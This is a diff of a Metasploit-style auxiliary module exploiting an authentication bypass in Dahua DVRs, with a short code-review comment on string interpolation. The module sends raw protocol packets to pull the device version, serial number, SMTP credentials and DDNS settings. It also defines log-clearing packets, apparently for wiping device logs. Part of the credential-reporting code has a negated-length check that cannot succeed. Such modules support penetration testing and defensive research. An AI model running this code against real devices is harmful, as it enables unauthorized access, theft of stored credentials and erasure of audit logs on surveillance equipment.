modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb

```diff
@@ -0,0 +1,376 @@
+             "\xa8\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" \
+             "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+  GROUPS = "\xa6\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00" \
+           "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+  USERS = "\xa6\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00" \
+          "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+  SN = "\xa4\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00" \
+       "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+  CLEAR_LOGS1 = "\x60\x00\x00\x00\x00\x00\x00\x00\x90\x00\x00\x00\x00\x00\x00\x00" \
+               "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+  CLEAR_LOGS2 = "\x60\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00" \
+                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+
+  def setup
+    @password = datastore['PASSWORD']
+    @password ||= Rex::Text.rand_text_alpha(6)
+  end
+
+  def grab_version
+    connect
+    sock.put(VERSION)
+    data = sock.get(1024)
+    if data =~ /[\x00]{8,}([[:print:]]+)/
+      ver = Regexp.last_match[1]
+      print_status("Version: #{ver} @ #{rhost}:#{rport}!")
+    end
+  end
+
+  def grab_sn
+    sock.put(SN)
+    data = sock.get(1024)
+    if data =~ /[\x00]{8,}([[:print:]]+)/
+      serial = Regexp.last_match[1]
+      print_status("Serial Number: #{serial} @ #{rhost}:#{rport}!")
+    end
+  end
+
+  def grab_email
+    connect
+    sock.put(EMAIL)
+    if data = sock.get(1024).split('&&')
+      print_status("Email Settings: @ #{rhost}:#{rport}!")
+      if data[0] =~ /([\x00]{8,}(?=.{1,255}$)[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?(?:\.[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?)*\.?+:\d+)/
+        if mailhost = Regexp.last_match[1].split(':')
+          print_status("  Server: #{mailhost[0]}") unless mailhost[0].nil?
+          print_status("  Destination Email: #{data[1]}") unless mailhost[1].nil?
+        end
+          if !data[5].nil? && !data[6].nil?
+            print_good("  SMTP User: #{data[5]}") unless data[5].nil?
+            print_good("  SMTP Password: #{data[6]}") unless data[6].nil?
+            muser = "#{data[5]}"
+            mpass = "#{data[6]}"
+            mailserver = "#{mailhost[0]}"
+            print_good("MailServer: #{mailserver}")
+            if !mailserver.to_s.strip.length == 0 && !muser.to_s.strip.length == 0 && !mpass.to_s.strip.length == 0
+              report_email_creds(mailserver, rport, muser, mpass) if !mailserver.nil? && !muser.nil? && !mpass.nil?
+            end
+          end
+      end
+    end
+  end
+
+  def grab_ddns
+    connect
+    sock.put(DDNS)
+    if data = sock.get(1024)
+      data = data.split(/&&[0-1]&&/)
+      data.each_with_index do |val, index|
+        if index > 0
+          val = val.split("&&")
+          ddns_service = "#{val[0]}"
```

Comment:
unless I am missing something, there is no need to try and convert these to strings through interpolation.